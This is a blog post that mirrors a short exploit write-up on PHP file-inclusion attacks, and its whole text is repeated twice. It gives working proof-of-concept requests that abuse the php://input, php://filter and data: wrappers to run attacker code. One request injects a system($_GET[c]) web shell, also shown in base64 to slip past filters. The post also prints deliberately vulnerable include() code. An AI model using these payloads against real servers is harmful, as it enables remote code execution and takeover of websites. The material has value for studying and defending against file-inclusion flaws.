Self Contained RFI in PHP
This is a direct rip from here : http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html It is for my own record, and can be seen as a mirror. :)
Sometimes those two tricks may be useful in RFI attacks.
1. Using php://input wrapper
php://input wrapper allows you to read raw POST data (http://ru2.php.net/wrappers.php).
For example, there is such code: sini2
For exploitation we need:
allow_url_include=On
magic_quotes_gpc=Off
PoC:
POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com
<?php passthru('dir'); ?>
Also using additional php://filter wrapper (available since PHP 5.0.0) we can encode our php code:
POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com
<?php passthru('dir'); ?>
2. Using data: wrapper
Since version 5.2.0 PHP supports "data" URL scheme (http://ru.php.net/manual/ru/wrappers.data.php).
Example code:
For exploitation we need:
PHP version => 5.2.0
allow_url_include=On
PoC:
http://site.com/index2.php?file=data:,<?php system($_GET[c]); ?>?&c=dir
It's possible to encode this php code into Base64:
http://site.com/index2.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
This methods are interesting because attacker don't need to include his php-code from any http/ftp/etc server. Also attacker can bypass some simple filtrations like in second example code.
kudos to original writer, http://www.cr0w.ru
//alak
Sometimes those two tricks may be useful in RFI attacks.
1. Using php://input wrapper
php://input wrapper allows you to read raw POST data (http://ru2.php.net/wrappers.php).
For example, there is such code: sini2
<?
if ( include($_GET['file'] . '.php') ) {
echo 'Henck!'; } else {
echo 'Error!'; }
?>
For exploitation we need:
allow_url_include=On
magic_quotes_gpc=Off
PoC:
POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com
<?php passthru('dir'); ?>
Also using additional php://filter wrapper (available since PHP 5.0.0) we can encode our php code:
POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com
<?php passthru('dir'); ?>
2. Using data: wrapper
Since version 5.2.0 PHP supports "data" URL scheme (http://ru.php.net/manual/ru/wrappers.data.php).
Example code:
<?php
$file = $_GET['file']; // Filtration of directory change and URLs:
$file = str_replace('/', '', $file);
$file = str_replace('.', '', $file);
if ( include($file . '.php') ) {
echo 'Henck!'; } else {
echo 'Error!'; }
?>
For exploitation we need:
PHP version => 5.2.0
allow_url_include=On
PoC:
http://site.com/index2.php?file=data:,<?php system($_GET[c]); ?>?&c=dir
It's possible to encode this php code into Base64:
http://site.com/index2.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
This methods are interesting because attacker don't need to include his php-code from any http/ftp/etc server. Also attacker can bypass some simple filtrations like in second example code.
kudos to original writer, http://www.cr0w.ru
//alak
Comments
Post a Comment